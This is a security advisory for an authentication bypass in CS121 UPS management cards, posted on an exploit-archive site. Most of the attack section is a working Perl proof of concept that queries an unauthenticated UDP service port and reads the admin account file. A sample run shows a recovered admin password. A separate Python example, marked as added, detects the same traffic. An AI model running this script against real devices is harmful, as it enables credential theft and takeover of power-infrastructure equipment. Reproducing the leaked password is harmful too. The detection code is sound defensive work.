UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak

2014.05.18
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

UPS Web/SNMP-Manager CS121 by Generex ships with a "service" port enabled by default (UDP port 4000, listed as "Port for tools" in the system parameters) that makes it possible to bypass any login configured for HTTP(S), SNMP or telnet. CS121 is a widely used management card in UPS systems from Legrand, Rittal, Eaton, AEG, Masterguard and others. Attached is a PoC, found and verified on Legrand UPS units with different firmware releases. If you are hardcore enough, you may also flash your own HyNetOS firmware and take over the world ;-)

Sample run:

./upssearch.pl $IP
UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010
Target system parameters (current):
Default Protocol : TCP/IP
Default Driver : Ethernet
Mac address : 00-03-05-00-00-00
IP address : XX.XX.XX.XX
Net Mask : 255.255.255.192
Default Gateway : XX.XX.XX.XX
DHCP : 0.0.0.0
DNS : 0.0.0.0
Port for tools : 4000
Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

upssearch.pl:

#!/usr/bin/perl -w
# upssearch.pl - PoC: talk to a CS121 card over its unauthenticated "tools" port (UDP/4000)
use strict;
use IO::Socket;
use constant MAXBYTES => 1024;

my $socket = IO::Socket::INET->new(
    PeerPort => 4000,
    PeerAddr => $ARGV[0],
    Type     => SOCK_DGRAM,
    Proto    => 'udp'
) or die "cannot create socket: $!";
my $inline;

# Firmware/ROM version banner
$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";

# Network parameters, including "Port for tools"
$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

# Read the account file from flash; no login is required on this port
print "Searching login\n";
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");
while ($socket->recv($inline, MAXBYTES)) {
    if ($inline =~ /admin/i) {
        print $inline;
        exit;
    }
}
sleep(1);
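The service-port traffic described above, as an added detection example that is not part of the original advisory: it classifies UDP payloads sent to port 4000 using the command strings the PoC issues, ranking the reads of the account file above plain version/parameter queries. The record format, the sample traffic and the management subnet are assumptions; only the port and the command strings come from the advisory.

```python
import ipaddress

TOOLS_PORT = 4000  # "Port for tools" in the advisory's 'show syspar' output
MGMT_NETS = [ipaddress.ip_network("10.0.100.0/24")]  # assumed management subnet

# Commands the PoC sends over the service port; the last two read the
# account file from flash, so they rank higher than the recon commands.
RECON_CMDS = {"<version>", "show syspar", "start"}
CRED_CMDS = {"cd /flash", "type ftp_accounts.txt"}

def classify_payload(payload):
    """Return a severity for a single UDP payload, or None if not a CS121 command."""
    cmd = payload.decode("ascii", "replace").strip().lower()
    if cmd in CRED_CMDS:
        return "high"
    if cmd in RECON_CMDS:
        return "medium"
    return None

def detect(records):
    """records: iterable of (src_ip, dst_ip, dst_port, payload bytes)."""
    findings = []
    for src, dst, dport, payload in records:
        if dport != TOOLS_PORT:
            continue
        sev = classify_payload(payload)
        if sev is None:
            continue
        # The port has no authentication at all, so management hosts are only
        # downgraded one step for recon, never exempted.
        if sev == "medium" and any(ipaddress.ip_address(src) in n for n in MGMT_NETS):
            sev = "low"
        findings.append({"src": src, "dst": dst, "severity": sev,
                         "command": payload.decode("ascii", "replace").strip()})
    return findings

# Constructed sample traffic, not taken from the advisory.
SAMPLE = [
    ("10.0.100.5", "10.0.7.20", 4000, b"<VERSION>"),
    ("192.168.3.77", "10.0.7.20", 4000, b"<VERSION>"),
    ("192.168.3.77", "10.0.7.20", 4000, b"show syspar"),
    ("192.168.3.77", "10.0.7.20", 4000, b"type ftp_accounts.txt"),
    ("192.168.3.77", "10.0.7.20", 161, b"\x30\x26\x02\x01"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Until the vendor disables the port, the same allowlist should be enforced at the network edge, since the card itself performs no authentication for it.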

References:

http://seclists.org/fulldisclosure/2014/May/att-75/upssearch-pl.txt


Copyright 2024, cxsecurity.com
